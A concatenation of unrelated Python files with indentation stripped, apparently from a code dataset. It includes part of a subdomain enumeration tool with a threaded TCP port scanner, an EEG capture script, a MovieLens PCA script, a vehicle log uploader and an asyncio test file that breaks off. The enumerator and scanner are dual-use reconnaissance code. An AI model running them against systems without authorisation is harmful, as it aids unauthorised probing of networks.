# once the send_req is rewritten we don't need to call this function, the stock one should be ok
def enumerate(self):
while self.url != '':
resp = self.send_req(self.url)
resp = json.loads(resp)
if 'error' in resp:
self.print_(R + "[!] Error: Virustotal probably now is blocking our requests" + W)
break
if 'links' in resp and 'next' in resp['links']:
self.url = resp['links']['next']
else:
self.url = ''
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
#resp is already parsed as json
try:
for i in resp['data']:
if i['type'] == 'domain':
subdomain = i['id']
if not subdomain.endswith(self.domain):
continue
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
class ThreatCrowd(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={domain}'
self.engine_name = "ThreatCrowd"
self.q = q
super(ThreatCrowd, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
try:
links = json.loads(resp)['subdomains']
for link in links:
subdomain = link.strip()
if not subdomain.endswith(self.domain):
continue
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception as e:
pass
class CrtSearch(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://crt.sh/?q=%25.{domain}'
self.engine_name = "SSL Certificates"
self.q = q
super(CrtSearch, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
if resp:
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
link_regx = re.compile('<TD>(.*?)</TD>')
try:
links = link_regx.findall(resp)
for link in links:
link = link.strip()
subdomains = []
if '<BR>' in link:
subdomains = link.split('<BR>')
else:
subdomains.append(link)
for subdomain in subdomains:
if not subdomain.endswith(self.domain) or '*' in subdomain:
continue
if '@' in subdomain:
subdomain = subdomain[subdomain.find('@')+1:]
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception as e:
print(e)
pass
class PassiveDNS(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = 'https://api.sublist3r.com/search.php?domain={domain}'
self.engine_name = "PassiveDNS"
self.q = q
super(PassiveDNS, self).__init__(base_url, self.engine_name, domain, subdomains, q=q, silent=silent, verbose=verbose)
return
def req(self, url):
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception as e:
resp = None
return self.get_response(resp)
def enumerate(self):
url = self.base_url.format(domain=self.domain)
resp = self.req(url)
if not resp:
return self.subdomains
self.extract_domains(resp)
return self.subdomains
def extract_domains(self, resp):
try:
subdomains = json.loads(resp)
for subdomain in subdomains:
if subdomain not in self.subdomains and subdomain != self.domain:
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception as e:
pass
class portscan():
def __init__(self, subdomains, ports):
self.subdomains = subdomains
self.ports = ports
self.lock = None
def port_scan(self, host, ports):
openports = []
self.lock.acquire()
for port in ports:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
result = s.connect_ex((host, int(port)))
if result == 0:
openports.append(port)
s.close()
except Exception:
pass
self.lock.release()
if len(openports) > 0:
print("%s%s%s - %sFound open ports:%s %s%s%s" % (G, host, W, R, W, Y, ', '.join(openports), W))
def run(self):
self.lock = threading.BoundedSemaphore(value=20)
for subdomain in self.subdomains:
t = threading.Thread(target=self.port_scan, args=(subdomain, self.ports))
t.start()
def main(domain, threads, savefile, ports, silent, verbose, enable_bruteforce, engines):
bruteforce_list = set()
search_list = set()
if is_windows:
subdomains_queue = list()
else:
subdomains_queue = multiprocessing.Manager().list()
# Check Bruteforce Status
if enable_bruteforce or enable_bruteforce is None:
enable_bruteforce = True
# Validate domain
domain_check = re.compile("^(http|https)?[a-zA-Z0-9]+([\-\.]{1}[a-zA-Z0-9]+)*\.[a-zA-Z]{2,}$")
if not domain_check.match(domain):
if not silent:
print(R + "Error: Please enter a valid domain" + W)
return []
if not domain.startswith('http://') or not domain.startswith('https://'):
domain = 'http://' + domain
parsed_domain = urlparse.urlparse(domain)
if not silent:
print(B + "[-] Enumerating subdomains now for %s" % parsed_domain.netloc + W)
if verbose and not silent:
print(Y + "[-] verbosity is enabled, will show the subdomains results in realtime" + W)
supported_engines = {'baidu': BaiduEnum,
'yahoo': YahooEnum,
'google': GoogleEnum,
'bing': BingEnum,
'ask': AskEnum,
'netcraft': NetcraftEnum,
'dnsdumpster': DNSdumpster,
'virustotal': Virustotal,
'threatcrowd': ThreatCrowd,
'ssl': CrtSearch,
'passivedns': PassiveDNS
}
chosenEnums = []
if engines is None:
chosenEnums = [
BaiduEnum, YahooEnum, GoogleEnum, BingEnum, AskEnum,
NetcraftEnum, DNSdumpster, Virustotal, ThreatCrowd,
CrtSearch, PassiveDNS
]
else:
engines = engines.split(',')
for engine in engines:
if engine.lower() in supported_engines:
chosenEnums.append(supported_engines[engine.lower()])
# Start the engines enumeration
enums = [enum(domain, [], q=subdomains_queue, silent=silent, verbose=verbose) for enum in chosenEnums]
for enum in enums:
enum.start()
for enum in enums:
enum.join()
subdomains = set(subdomains_queue)
for subdomain in subdomains:
search_list.add(subdomain)
if enable_bruteforce:
if not silent:
print(G + "[-] Starting bruteforce module now using subbrute.." + W)
record_type = False
path_to_file = os.path.dirname(os.path.realpath(__file__))
subs = os.path.join(path_to_file, 'subbrute', 'names.txt')
resolvers = os.path.join(path_to_file, 'subbrute', 'resolvers.txt')
process_count = threads
output = False
json_output = False
bruteforce_list = subbrute.print_target(parsed_domain.netloc, record_type, subs, resolvers, process_count, output, json_output, search_list, verbose)
subdomains = search_list.union(bruteforce_list)
if subdomains:
subdomains = sorted(subdomains, key=subdomain_sorting_key)
if savefile:
write_file(savefile, subdomains)
if not silent:
print(Y + "[-] Total Unique Subdomains Found: %s" % len(subdomains) + W)
if ports:
if not silent:
print(G + "[-] Start port scan now for the following ports: %s%s" % (Y, ports) + W)
ports = ports.split(',')
pscan = portscan(subdomains, ports)
pscan.run()
elif not silent:
for subdomain in subdomains:
print(G + subdomain + W)
return subdomains
def interactive():
args = parse_args()
domain = args.domain
threads = args.threads
savefile = args.output
ports = args.ports
enable_bruteforce = args.bruteforce
verbose = args.verbose
engines = args.engines
if verbose or verbose is None:
verbose = True
if args.no_color:
no_color()
banner()
res = main(domain, threads, savefile, ports, silent=False, verbose=verbose, enable_bruteforce=enable_bruteforce, engines=engines)
if __name__ == "__main__":
interactive()
|
capture_bci.py
|
from pylsl import StreamInlet, resolve_byprop, local_clock, TimeoutError
from pylsl import StreamInfo, StreamOutlet
from bci import open_bci_v3 as bci
import signal, sys, os, time, csv
import serial
import threading
import win32api as win
board = None
samples_lock = threading.Lock()
class Board(object):
LSL_STREAM_NAME = 'psychopy'
LSL_BCI_STREAM_NAME = 'bci'
LSL_BCI_NUM_CHANNELS = 8
LSL_BCI_SAMPLE_RATE = 0 #
def __init__(self):
# check device manager for correct COM port.
self.board = bci.OpenBCIBoard(port='COM3', filter_data=True,
daisy=False)
# setup LSL
streams = resolve_byprop('name', self.LSL_STREAM_NAME, timeout=2.5)
try:
self.inlet = StreamInlet(streams[0])
except IndexError:
raise ValueError('Make sure stream name="%s", is opened first.'
% LSL_STREAM_NAME)
self.running = True
self.samples = []
info = StreamInfo(self.LSL_BCI_STREAM_NAME, 'eeg',
self.LSL_BCI_NUM_CHANNELS, self.LSL_BCI_SAMPLE_RATE, 'float32', 'uid2')
self.outlet = StreamOutlet(info)
# LSL and BCI samples are synchronized to local_clock(), which is the
# runtime on this slave, not the host
def _record_lsl(self):
while self.running:
sample, timestamp = self.inlet.pull_sample(timeout=5)
# time correction to sync to local_clock()
try:
if timestamp is not None and sample is not None:
timestamp = timestamp + self.inlet.time_correction(timeout=5)
samples_lock.acquire()
self.samples.append(('STIM', timestamp, sample))
samples_lock.release()
except TimeoutError:
pass
print('closing lsl')
self.inlet.close_stream()
def _bci_sample(self, sample):
NUM_CHANNELS = 8
data = sample.channel_data[0:NUM_CHANNELS]
samples_lock.acquire()
self.samples.append(('BCI', local_clock(), data))
samples_lock.release()
self.outlet.push_sample(data)
def _record_bci(self):
try:
self.board.start_streaming(self._bci_sample)
except:
print('Got a serial exception. Expected behavior if experiment ending.')
def capture(self):
self.bci_thread = threading.Thread(target=self._record_bci)
self.lsl_thread = threading.Thread(target=self._record_lsl)
self.bci_thread.start()
self.lsl_thread.start()
def export_data(self):
self.board.stop()
self.board.disconnect()
self.running = False
self.bci_thread.join(5)
self.lsl_thread.join(5)
print('Joined threads, now outputting BCI data.')
i = 0
folder = '\\recorded_data\\BCI'
folder_path = os.getcwd() + folder
#new folders recorded_data/BCI will be created in current directory (where experiment.py is saved) if they don't exist
if not os.path.exists(folder_path):
os.makedirs(folder_path)
#file_path = os.path.normpath(folder_path + 'data-%s.csv')
file_path = folder_path + '\\data-%s.csv'
while os.path.exists(file_path % i):
i += 1
# csv writer with stim_type, msg, and timestamp, then data
with open(file_path % i, 'w+') as f:
writer = csv.writer(f)
writer.writerow(('Signal Type', 'Msg', 'Time', 'Channel 1', 'Channel 2', 'Channel 3', 'Channel 4', 'Channel 5', 'Channel 6', 'Channel 7', 'Channel 8' ))
for sample in self.samples:
signal_type, timestamp, datas = sample
out = (signal_type, 'msg', timestamp)
for data in datas:
out = out + (data,)
writer.writerow(out)
def __str__(self):
return '%s EEG channels' % board.getNbEEGChannels()
def __del__(self):
self.board.disconnect()
self.inlet.close_stream()
def load(queue):
try:
global board
board = Board()
print('init board')
except:
if queue is not None:
queue.put('FAIL')
def start():
board.capture()
def stop(queue):
board.export_data()
print('Finished exporting data.')
queue.put('SAVED_BCI')
#os._exit(0) # dirty, but it's ok because everything is already cleaned up
def sigint_handler(signal, frame):
stop()
def sigterm_handler(signal, frame):
stop()
def main():
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
load(queue=None)
start()
signal.pause()
def win_handler(dwCtrlhandler):
if dwCtrlhandler in (0,2,6):
return 1
#return 0
def begin(queue, event=None):
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
if sys.platform == 'win32':
win.SetConsoleCtrlHandler(win_handler,1)
load(queue)
queue.put('CONNECTED')
start()
try:
# linux signal handling
while True:
signal.pause()
except AttributeError:
# signal.pause() not implemented on windows
while not event.is_set():
time.sleep(1)
print('event was set in bci, stopping')
stop(queue)
if __name__ == '__main__':
main()
|
main4.py
|
import numpy as np
from numpy import linalg as la
import time
import subprocess
from streaming import *
#import MovieLensNew as MovieLens
import MovieLens
from multiprocessing import Process
from multiprocessing import Array
import sys
def runBOI(stream, k,id,arr,allT,nWorkers,doneWithBlock,cond, parentFiles):
# Sapirla: Workaround for this issue:
# http://bugs.python.org/issue12488
for pc in parentFiles:
os.close(pc)
sys.stderr = open("logs/Worker"+str(id)+".out", "a")
#sys.stderr.write('\n')
boi=ParallelBlockOrthogonal(
id=id,
arr=arr,
allT=allT,
doneWithBlock=doneWithBlock,
cond=cond,
k=k,
order=2,
stream=stream
)
for x in boi:
continue
print boi.getEstimate().T[:,0:3]
print np.dot(boi.getEstimate().T,np.loadtxt('mlpc.txt'))
return boi.getEstimate()
if __name__ == "__main__":
t0 = time.time()
p=65133
k=2
nWorkers=2
arr = Array('d', p*k)
allT = Array('I', nWorkers,lock=False)
doneWithBlock = Array('I', nWorkers,lock=False)
cond = Condition()
# Producer Stream
producer=StreamIMUX(
stream=MovieLens.UserStream(sparse=True, file='/var/datasets/ml-10M100K/ratingsTab.dat'),
nPipes=nWorkers
)
childrenStreams=producer.getChildrenStreams()
parentFiles=producer.getParentFiles()
processes=[]
for id in xrange(1,nWorkers+1):
arg={ 'id':id,
'stream':childrenStreams[id-1],
'k':k,
'arr':arr,
'allT':allT,
'nWorkers':nWorkers,
'doneWithBlock':doneWithBlock,
'cond':cond,
'parentFiles':parentFiles
}
processes += [Process(target=runBOI, kwargs=arg)]
processes[-1].start()
# Produce (serve samples to the created pipes)
for x in producer:
continue
# Join them
for id in xrange(1,nWorkers+1):
processes[id-1].join()
t1 = time.time()
total = t1-t0
print "Total time: ", total
#print np.dot(results[0].T,results[1])
|
uploader.py
|
#!/usr/bin/env python
import os
import time
import stat
import json
import random
import ctypes
import inspect
import requests
import traceback
import threading
from collections import Counter
from selfdrive.swaglog import cloudlog
from selfdrive.loggerd.config import ROOT
from common.params import Params
from common.api import api_get
fake_upload = os.getenv("FAKEUPLOAD") is not None
def raise_on_thread(t, exctype):
for ctid, tobj in threading._active.items():
if tobj is t:
tid = ctid
break
else:
raise Exception("Could not find thread")
'''Raises an exception in the threads with id tid'''
if not inspect.isclass(exctype):
raise TypeError("Only types can be raised (not instances)")
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid),
ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# "if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)
raise SystemError("PyThreadState_SetAsyncExc failed")
def listdir_with_creation_date(d):
lst = os.listdir(d)
for fn in lst:
try:
st = os.stat(os.path.join(d, fn))
ctime = st[stat.ST_CTIME]
yield (ctime, fn)
except OSError:
cloudlog.exception("listdir_with_creation_date: stat failed?")
yield (None, fn)
def listdir_by_creation_date(d):
times_and_paths = list(listdir_with_creation_date(d))
return [path for _, path in sorted(times_and_paths)]
def clear_locks(root):
for logname in os.listdir(root):
path = os.path.join(root, logname)
try:
for fname in os.listdir(path):
if fname.endswith(".lock"):
os.unlink(os.path.join(path, fname))
except OSError:
cloudlog.exception("clear_locks failed")
class Uploader(object):
def __init__(self, dongle_id, access_token, root):
self.dongle_id = dongle_id
self.access_token = access_token
self.root = root
self.upload_thread = None
self.last_resp = None
self.last_exc = None
def clean_dirs(self):
try:
for logname in os.listdir(self.root):
path = os.path.join(self.root, logname)
# remove empty directories
if not os.listdir(path):
os.rmdir(path)
except OSError:
cloudlog.exception("clean_dirs failed")
def gen_upload_files(self):
if not os.path.isdir(self.root):
return
for logname in listdir_by_creation_date(self.root):
path = os.path.join(self.root, logname)
names = os.listdir(path)
if any(name.endswith(".lock") for name in names):
continue
for name in names:
key = os.path.join(logname, name)
fn = os.path.join(path, name)
yield (name, key, fn)
def get_data_stats(self):
name_counts = Counter()
total_size = 0
for name, key, fn in self.gen_upload_files():
name_counts[name] += 1
total_size += os.stat(fn).st_size
return dict(name_counts), total_size
def next_file_to_upload(self):
# try to upload log files first
for name, key, fn in self.gen_upload_files():
if name in ["rlog", "rlog.bz2"]:
return (key, fn, 0)
# then upload compressed camera file
for name, key, fn in self.gen_upload_files():
if name in ["fcamera.hevc"]:
return (key, fn, 1)
# then upload other files
for name, key, fn in self.gen_upload_files():
if not name.endswith('.lock') and not name.endswith(".tmp"):
return (key, fn, 1)
return None
def do_upload(self, key, fn):
try:
url_resp = api_get("v1.1/"+self.dongle_id+"/upload_url/", timeout=2, path=key, access_token=self.access_token)
url_resp_json = json.loads(url_resp.text)
url = url_resp_json['url']
headers = url_resp_json['headers']
cloudlog.info("upload_url v1.1 %s %s", url, str(headers))
if fake_upload:
cloudlog.info("*** WARNING, THIS IS A FAKE UPLOAD TO %s ***" % url)
class FakeResponse(object):
def __init__(self):
self.status_code = 200
self.last_resp = FakeResponse()
else:
with open(fn, "rb") as f:
self.last_resp = requests.put(url, data=f, headers=headers)
except Exception as e:
self.last_exc = (e, traceback.format_exc())
raise
def normal_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
try:
self.do_upload(key, fn)
except Exception:
pass
return self.last_resp
def killable_upload(self, key, fn):
self.last_resp = None
self.last_exc = None
self.upload_thread = threading.Thread(target=lambda: self.do_upload(key, fn))
self.upload_thread.start()
self.upload_thread.join()
self.upload_thread = None
return self.last_resp
def abort_upload(self):
thread = self.upload_thread
if thread is None:
return
if not thread.is_alive():
return
raise_on_thread(thread, SystemExit)
thread.join()
def upload(self, key, fn):
# write out the bz2 compress
if fn.endswith("log"):
ext = ".bz2"
cloudlog.info("compressing %r to %r", fn, fn+ext)
if os.system("nice -n 19 bzip2 -c %s > %s.tmp && mv %s.tmp %s%s && rm %s" % (fn, fn, fn, fn, ext, fn)) != 0:
cloudlog.exception("upload: bzip2 compression failed")
return False
# assuming file is named properly
key += ext
fn += ext
try:
sz = os.path.getsize(fn)
except OSError:
cloudlog.exception("upload: getsize failed")
return False
cloudlog.event("upload", key=key, fn=fn, sz=sz)
cloudlog.info("checking %r with size %r", key, sz)
if sz == 0:
# can't upload files of 0 size
os.unlink(fn) # delete the file
success = True
else:
cloudlog.info("uploading %r", fn)
# stat = self.killable_upload(key, fn)
stat = self.normal_upload(key, fn)
if stat is not None and stat.status_code in (200, 201):
cloudlog.event("upload_success", key=key, fn=fn, sz=sz)
os.unlink(fn) # delete the file
success = True
else:
cloudlog.event("upload_failed", stat=stat, exc=self.last_exc, key=key, fn=fn, sz=sz)
success = False
self.clean_dirs()
return success
def uploader_fn(exit_event):
cloudlog.info("uploader_fn")
params = Params()
dongle_id, access_token = params.get("DongleId"), params.get("AccessToken")
if dongle_id is None or access_token is None:
cloudlog.info("uploader MISSING DONGLE_ID or ACCESS_TOKEN")
raise Exception("uploader can't start without dongle id and access token")
uploader = Uploader(dongle_id, access_token, ROOT)
while True:
backoff = 0.1
while True:
if exit_event.is_set():
return
d = uploader.next_file_to_upload()
if d is None:
break
key, fn, _ = d
cloudlog.info("to upload %r", d)
success = uploader.upload(key, fn)
if success:
backoff = 0.1
else:
cloudlog.info("backoff %r", backoff)
time.sleep(backoff + random.uniform(0, backoff))
backoff = min(backoff*2, 120)
cloudlog.info("upload done, success=%r", success)
time.sleep(5)
def main(gctx=None):
uploader_fn(threading.Event())
if __name__ == "__main__":
main()
|
test_base_events.py
|
"""Tests for base_events.py"""
import concurrent.futures
import errno
import math
import os
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def tearDownModule():
asyncio.set_event_loop_policy(None)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
if not support.IPV6_ENABLED:
return
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = self.loop.create_future()
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
class DummyExecutor(concurrent.futures.ThreadPoolExecutor):
def submit(self, fn, *args, **kwargs):
raise NotImplementedError(
'cannot submit into a dummy executor')
executor = DummyExecutor()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_set_default_executor_deprecation_warnings(self):
executor = mock.Mock()
with self.assertWarns(DeprecationWarning):
self.loop.set_default_executor(executor)
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = loop.create_future()
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
